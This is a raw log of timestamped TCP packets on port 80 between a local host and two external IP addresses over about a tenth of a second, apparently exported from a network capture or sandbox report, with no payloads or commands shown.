Jun 24, 2024 00:10:22.310246944 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.310264111 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.310311079 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.310360909 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.310372114 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.310381889 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.310391903 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.310403109 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.310405970 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.310441017 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.310452938 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.310473919 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.310484886 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.310496092 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.310519934 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.310558081 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.310596943 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.310606003 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.310611963 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.310616970 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.310661077 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.310702085 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.310766935 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.310777903 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.310791016 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.310801029 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.310811043 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.310813904 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.310822010 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.310832024 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.310832024 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.310862064 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.310887098 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.311585903 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.311597109 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.311616898 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.311631918 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.311633110 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.311645031 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.311655045 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.311655045 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.311669111 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.311702013 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.311727047 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.311734915 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.311745882 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.311758041 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.311768055 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.311779022 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.311779976 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.311789989 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.311800957 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.311844110 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.312479019 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.312499046 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.312506914 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.312530041 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.312562943 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.312602043 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.312613010 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.312623024 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.312633991 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.312644958 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.312668085 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.312673092 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.312711000 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.312736988 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.312778950 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.312808037 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.312818050 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.312827110 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.312838078 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.312848091 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.312848091 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.312889099 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.312927008 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.312937021 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.312947035 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.312957048 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.312968969 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.312973022 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.313019037 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.313098907 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.313108921 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.313124895 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.313136101 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.313154936 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.313698053 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.313720942 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.313730955 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.313740015 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.313791990 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.313791990 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.313828945 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.313838959 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.313849926 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.313862085 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.313873053 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.313903093 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.313922882 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.313966990 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.314007998 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.314018011 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.314028978 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.314038992 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.314049006 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.314063072 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.314101934 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.314131975 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.314141989 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.314152002 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.314182043 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.314218044 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.314270973 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.314281940 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.314292908 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.314302921 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.314313889 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.314316034 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.314323902 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.314335108 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.314344883 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.314348936 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.314393044 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.314462900 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.314472914 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.314508915 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.314610004 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.314620972 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.314630985 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.314641953 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.314651966 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.314651966 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.314661980 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.314671993 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.314682961 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.314692020 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.314692974 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.314703941 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.314714909 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.314726114 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.314758062 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.314994097 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.315038919 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.327563047 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.327586889 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.327596903 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.327611923 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.327646017 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.327650070 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.327661037 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.327671051 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.327697039 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.327721119 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.327780008 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.327795029 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.327822924 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.327842951 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.329720974 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.329767942 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.329786062 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.329796076 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.329829931 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.329845905 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.329857111 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.329866886 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.329878092 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.329890966 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.329920053 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.329956055 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.329998016 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.330024004 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.330034971 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.330063105 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.330086946 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.330106020 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.330116034 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.330126047 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.330136061 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.330148935 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.330151081 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.330185890 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.330199957 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.330241919 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.351900101 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.351917982 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.351933956 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.351973057 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.352020025 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.352050066 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.352061033 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.352072001 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.352083921 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.352102995 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.352129936 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.352134943 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.352159977 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.352190971 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.352205038 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.352227926 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.352240086 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.352250099 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.352257967 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.352262020 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.352277040 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.352288961 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.352329016 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.352463961 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.352474928 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.352490902 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.352500916 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.352510929 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.352520943 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.352526903 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.352533102 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.352549076 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.352551937 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.352595091 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.352626085 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.358293056 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.358346939 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.358350039 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.358355999 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.358397961 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.358405113 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.358409882 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.358443975 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.358462095 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.358475924 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.358475924 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.358488083 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.358534098 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.358535051 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.358865023 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.358912945 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.358912945 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.358923912 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.358958006 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.358971119 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.358982086 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.358997107 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.359021902 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.359036922 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.359047890 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.359090090 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.359101057 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.359112024 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.359169006 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.359178066 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.359189034 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.359230995 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.359273911 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.359285116 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.359297037 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.359307051 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.359316111 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.359328032 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.359359026 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.359386921 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.359550953 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.359560966 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.359575033 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.359585047 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.359595060 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.359603882 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.359605074 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.359618902 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.359632969 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.359682083 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.359694958 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.359704971 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.359714985 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.359725952 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.359736919 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.359745979 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.359755993 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.359755993 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.359787941 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.359817982 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.360027075 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.360037088 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.360054970 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.360069036 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.360078096 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.360090971 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.360100031 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.360156059 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.360234976 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.360245943 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.360256910 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.360286951 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.360318899 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.360340118 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.360351086 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.360362053 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.360372066 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.360383034 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.360392094 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.360393047 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.360404015 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.360414982 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.360431910 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.360450983 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.360500097 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.360605955 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.360616922 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.360626936 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.360637903 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.360649109 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.360661983 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.360692024 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.360743046 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.360754013 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.360764980 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.360776901 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.360786915 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.360795021 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.360800028 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.360815048 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.360843897 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.360876083 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.360888004 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.360897064 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.360932112 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.360964060 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.371905088 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.371916056 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.371926069 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.371965885 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.371984959 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.371985912 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.371997118 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.372008085 CEST	80	49726	185.172.128.116	192.168.2.5
